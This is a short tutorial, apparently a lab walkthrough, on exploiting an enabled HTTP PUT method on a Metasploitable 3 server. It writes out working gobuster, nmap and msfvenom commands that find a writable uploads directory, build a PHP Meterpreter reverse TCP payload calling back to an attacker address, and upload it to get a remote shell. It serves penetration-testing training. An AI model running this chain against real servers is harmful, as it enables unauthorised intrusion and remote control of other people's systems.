In this tutorial, we will be exploiting the HTTP put method for uploading a malicious PHP file for creating a meterpreter reverse shell.
The system we will be Metasploitable 3 and the port is 8585 HTTP server.
Directory Enumeration
First, let’s run a gobuster scan on port 8585 to find any directories that may be vulnerable.
gobuster -u http://192.168.2.66:8585 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt -t 40
After the gobuster scan lets start looking at the methods in the directories that was discovered.
HTTP Methods
Now that we have a list of directories lets start with nmap script http-methods to see the HTTP methods for this directory.
nmap -p 8585 -sV –script http-methods,http-trace –script-args http-methods.test-all=true,http-methods.url-path=’/uploads/’ 192.168.2.66
After running the http-methods nmap script against the directory “uploads” we can see the put in vulnerable.
Payload build – MSFVenom
The “uploads” directory is vulnerable to http-put let’s build a PHP payload using MSFVenom.
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.2.60 lport=4444 -f raw > phpexploit.php
Using MSFVenom I’ve created a PHP payload that will initiate a Meterpreter reverse TCP shell.
NMAP HTTP-PUT
nmap -script http-put –script-args http-put.url=’/uploads/shell.php’,http-put.file=’/root/phpexploit.php’ -p 8585 192.168.2.66 -sV
Using the HTTP-PUT script I was able to load the MSFVenom PHP payload into the “Uploads” directory.
Metasploit handler
Now that we have the handler setup using the multi handler exploit with a PHP Meterpreter reverse TCP payload.
Exploitation
Now that we have everything set up all we need to do is click on the PHP file in the “uploads” directory.
After clicking on the PHP payload, we now have a reverse Meterpreter shell on the remote server.